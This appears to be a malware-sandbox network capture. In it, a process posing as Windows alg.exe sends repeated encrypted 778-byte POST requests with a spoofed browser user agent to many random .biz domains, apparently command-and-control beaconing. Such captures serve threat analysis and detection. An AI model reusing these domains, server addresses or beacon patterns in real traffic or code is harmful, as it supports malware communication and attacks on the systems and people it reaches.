                                                                                                                                                                                                                                                                                                                                                                                                                  102192.168.2.55007844.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239156008 CET343OUTPOST /ap HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239190102 CET778OUTData Raw: b1 c6 49 26 51 bd 21 aa fe 02 00 00 bd 29 9e ae 1e d4 3c 58 1b 42 e0 81 95 64 5a c4 a9 82 3c 41 2f 3f 97 bd 22 4f 97 a9 ae 23 90 7c 19 b1 05 63 14 af 0c 9d 5e ef 01 b8 3c 9f 49 34 93 5b 9a a9 1b ce d7 98 59 76 0e d2 58 cd b8 c3 f5 fe e3 6f 0b a2
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: I&Q!)<XBdZ<A/?"O#|c^<I4[YvXo;aV:>8|bU1]4I^GV.\ln&:!wX^{d3jW`v{&JtGtKw4h[@?Pp`>=EbMu!RDA^r
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.907759905 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=731c54b240ef6a9645498cad443de438|155.94.241.188|1730130742|1730130742|0|1|0; path=/; domain=.mjheo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  103192.168.2.55007918.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928023100 CET353OUTPOST /lpcmjvhkj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928083897 CET778OUTData Raw: 78 1e 3f 4e bc d3 d7 9d fe 02 00 00 85 8f 10 2a 40 98 36 d4 fb 2d d3 e9 e5 21 4b 31 68 c6 53 9d 30 a8 30 a7 75 b9 33 19 5a 70 ef bd 39 f8 73 fc 21 6e 66 9a f1 d8 9c ff bb 3c 8b f9 17 ee a0 f0 41 5c 66 af 93 23 62 3e 1c 94 03 57 c1 0c c6 f0 86 2c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: x?N*@6-!K1hS00u3Zp9s!nf<A\f#b>W,j}F9>k"G2'-6c.&]C]96m|(aj8sp@!587h]tL>Ze\.w*
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.365535021 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2b8625d7d3da3dfa6dfa859ca6af83e2|155.94.241.188|1730130744|1730130744|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.733189106 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2b8625d7d3da3dfa6dfa859ca6af83e2|155.94.241.188|1730130744|1730130744|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  104192.168.2.56056918.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508419991 CET354OUTPOST /sjbthkaicrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.510689020 CET778OUTData Raw: 5a ee 09 65 b9 39 32 0a fe 02 00 00 9e 43 5b 32 f1 21 d8 62 2d 57 80 aa 4b 44 a2 02 5a d4 69 9e ea 21 78 3e 0c 89 41 28 6c c4 91 3c 4f 7b d5 3d 34 8a cd 43 58 2a b6 9c 96 15 bb 4d 49 e2 b8 b6 8f 45 c0 4a 28 b2 12 04 a0 bd 78 99 fb 8e 50 52 cb b6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Ze92C[2!b-WKDZi!x>A(l<O{=4CX*MIEJ(xPRKSJk:LVP(G8 |~u4V~d6uGjn /rw 4cICLm[U9}OD@/I5{:|{^VU[K\t!Gp4z
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.182507038 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bdc2d0feee6bced0cb43da9093357c43|155.94.241.188|1730130746|1730130746|0|1|0; path=/; domain=.zgapiej.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  105192.168.2.56057044.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202745914 CET343OUTPOST /dq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202774048 CET778OUTData Raw: 52 0f ba 82 83 64 47 78 fe 02 00 00 07 4f 3d d1 ca 28 bc 0c 98 42 ea 68 8e f1 52 75 5f f6 a5 7a 17 f6 f6 fa d5 14 9d 1b bc ee 0a ea 83 84 46 5e 43 d4 5f d9 af 18 04 f1 ac b1 13 0a 80 0b 8d 0b b3 61 53 b3 9f 77 d9 cb 71 0a 66 ce 75 e0 45 29 83 4b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: RdGxO=(BhRu_zF^C_aSwqfuE)K27DNXoY7A?mJ~oT9*xEI Tv$]SUR^6z6=uo]lf,o`zhTC+NuM
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.872064114 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=29b75d393543c469a04c5d10290831e1|155.94.241.188|1730130746|1730130746|0|1|0; path=/; domain=.jifai.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  106192.168.2.56057113.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.929936886 CET352OUTPOST /skriadsmnm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.929963112 CET778OUTData Raw: 4a 31 6a a0 4c 8f 5c e6 fe 02 00 00 bf 0d e8 66 f0 7d d6 13 fe a7 a7 5d ea e0 19 52 1f c2 1b c7 d8 d7 e0 39 dc d1 56 f7 15 9f ed 20 92 37 19 a1 5e fa c9 a7 f5 12 bc f0 e2 1b c9 09 98 12 fe 11 a5 21 23 82 c6 5f 2c 27 3f 47 d0 45 4b b5 f1 3b 43 04
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: J1jL\f}]R9V 7^!#_,'?GEK;Ct5Gl3Nc68~n;"#Y]@Jo-"<5|AP^3#XqMC3=pxvT>&njZ1w4K%]}d23TC9<`H:V
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.264233112 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.267072916 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268178940 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268692970 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  107192.168.2.56057235.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427431107 CET351OUTPOST /wawfta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427459955 CET778OUTData Raw: 62 e0 ba e1 3a f4 eb 46 fe 02 00 00 ff be 06 7a af 0e 3b c9 e5 53 2f 52 5b 2a 76 40 a6 15 cf a0 0c bf 3c 0c cc 25 c2 e1 ff 8b 1c 85 c2 b5 8d 16 6a d7 e5 c3 e8 78 3d 35 67 76 51 60 b7 f7 9d 55 49 44 c6 8a 08 6b 49 3c d3 3d 5e fc 49 08 aa c4 e4 d9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: b:Fz;S/R[*v@<%jx=5gvQ`UIDkI<=^Iq"abc0LxEhW~IvpL_}2!J'W-^4-4zbVh.q["+ a+rKZ[Ndn:M(,1Hv]BK<]U,q H
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.285726070 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=94a3440e5dee1813ba41665d1e03fbf6|155.94.241.188|1730130750|1730130750|0|1|0; path=/; domain=.ihcnogskt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  108192.168.2.56057318.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307679892 CET356OUTPOST /qcdcxwrbvorm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307708979 CET778OUTData Raw: 8b 97 e8 89 1e 64 2d f1 fe 02 00 00 24 0d ac 02 d3 c4 30 00 b8 86 1f 21 4a 22 73 9a a0 75 e0 04 bc fd 14 2b a6 5a 63 8e d6 59 3b 09 6d e3 cd 9e f9 f4 23 f2 de 23 f9 7b eb a5 42 95 71 02 84 33 16 6c 44 f6 d6 c7 e7 51 da dd c1 7b 77 d2 d9 35 11 1e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d-$0!J"su+ZcY;m##{Bq3lDQ{w5EX`Nn!0B>;Bx9-Znr#rA{6,29PY`F5GPF^\;W6e$}#9-2b_%vowi.|I`;t;4
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.716445923 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=35ad29fa8cec894c4b08887afaa4330b|155.94.241.188|1730130751|1730130751|0|1|0; path=/; domain=.kkqypycm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  109192.168.2.56057418.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736444950 CET343OUTPOST /x HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736479998 CET778OUTData Raw: e0 6b 86 ae ba 3b 3d 53 fe 02 00 00 94 a5 33 ae 9f fc ae 42 0e e0 83 fa 86 23 26 d3 29 e9 f6 a7 e6 2b 67 64 78 7f c8 19 cb 51 d0 9b 94 87 06 47 db d2 04 8d c6 2d 49 ac 53 ad f0 c5 e0 df e5 ed 58 58 c3 ab df 8b a3 9f 50 91 6e fc 61 34 02 73 7d d4
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: k;=S3B#&)+gdxQG-ISXXPna4s}A:Q{YtvE;'6[Ip<8i yu^~GMFRPvwY?tKyL0?hRde5408%W].!XS9&G:txU
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.563828945 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=4281c90d124344545f9462c18bc78f4d|155.94.241.188|1730130752|1730130752|0|1|0; path=/; domain=.uevrpr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  110192.168.2.55998634.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.266130924 CET352OUTPOST /lutskhb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
